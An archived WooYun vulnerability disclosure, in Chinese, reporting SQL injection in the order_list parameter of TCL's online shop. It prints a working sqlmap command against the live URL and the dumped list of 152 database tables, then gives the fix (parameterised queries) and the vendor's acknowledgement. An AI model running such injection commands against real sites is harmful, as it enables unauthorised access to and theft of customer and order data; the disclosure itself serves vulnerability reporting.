乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-30: 细节已通知厂商并且等待厂商处理中 2014-09-30: 厂商已经确认,细节仅向厂商公开 2014-10-10: 细节向核心白帽子及相关领域专家公开 2014-10-20: 细节向普通白帽子公开 2014-10-30: 细节向实习白帽子公开 2014-11-14: 细节向公众公开
未对用户输入正确执行危险字符清理
存在问题参数order_listpython sqlmap.py -u "http://shop.tcl.com/mall/goods/index.html?attrs_216=541&cat_id=20&order_list=*&porder=stb" --dbs
Database: shoptcl[152 tables]+------------------------------+| base_generate_number || c_goods_spec_index_0916 || ec_brand || ec_brand_category || ec_bulk_purchase || ec_cart || ec_category_spec || ec_category_spec_value || ec_comment || ec_comment_image || ec_consultation || ec_coupons || ec_coupons_goods || ec_coupons_use_detail || ec_custom_cat_menu || ec_evaluate || ec_evaluate_detail || ec_fenxiao_account || ec_fenxiao_copywritten || ec_fenxiao_fans_contact || ec_fenxiao_goods || ec_fenxiao_income_detail || ec_fenxiao_income_use_detail || ec_fenxiao_level || ec_fenxiao_order || ec_fenxiao_order_item || ec_fenxiao_product || ec_fenxiao_share || ec_fenxiao_share_stat || ec_fenxiao_shop_rela || ec_fenxiao_user || ec_fenxiao_user_audit || ec_fenxiao_user_cust || ec_fenxiao_withdraw || ec_freight_tpl || ec_freight_tpl_area || ec_freight_tpl_detail || ec_goods || ec_goods_collocation || ec_goods_custom_cat || ec_goods_gift || ec_goods_image || ec_goods_mapping || ec_goods_pkg || ec_goods_pkg_detail || ec_goods_pkg_image || ec_goods_relation || ec_goods_set || ec_goods_set_detail || ec_goods_spec_index || ec_group_purchase_item || ec_inventory_occupy_detail || ec_logistics_info || ec_logistics_tracking || ec_order || ec_order_discount || ec_order_item || ec_order_log || ec_order_msg_log || ec_order_refund || ec_order_refund_log || ec_payment || ec_payment_cfg || ec_product || ec_product_sku_rela || ec_product_sku_rela_0918 || ec_promotion || ec_promotion_discount || ec_promotion_integral || ec_promotion_present || ec_promotion_reduce || ec_promotion_seckill || ec_push_msg || ec_search_keword || ec_search_keyword || ec_search_log || ec_search_rela_keword || ec_search_weight_adjust || ec_search_weight_rule || ec_service_policy || ec_shop || ec_shop_category || ec_shop_sub_account || ec_spec || ec_spec_value || ec_store || ec_store_cover || ec_store_inventory || ec_store_sku || ec_transfer_account || ec_user_favorite || ec_user_history || esb_app_info || esb_app_permission || esb_msg_data || esb_msg_que || esb_service || esb_service_api || ro_resource || ro_role || ro_role_priv || ro_seller_log || ro_seller_menu || ro_subacct_role || ro_user || ro_user_address || sys_access_log || sys_admin || sys_admin_log || sys_admin_role || sys_admin_role_priv || sys_article || sys_caches || sys_category || sys_custom_category || sys_dict || sys_dict_type || sys_district || sys_email_verify_code || sys_feedback || sys_file || sys_file_server || sys_file_type || sys_image_thumbrule || sys_meta || sys_object_file || sys_point_rule || sys_position || sys_position_data || sys_position_keyword || sys_position_space || sys_poster || sys_poster_click || sys_poster_space || sys_reg_invite || sys_resource || sys_role || sys_session || sys_setting || sys_sms_sendlist || sys_sms_templates || sys_sms_verify_code || sys_template || sys_template_type || sys_user_point || sys_user_point_detail || sys_user_point_use_detail || sys_user_rank || sys_widget_callset || sys_widget_template || sys_widget_type || tmp_0916 |+------------------------------+
参数化SQL语句
危害等级:中
漏洞Rank:10
确认时间:2014-09-30 11:42
感谢您的关注,已转交相关单位处理。
暂无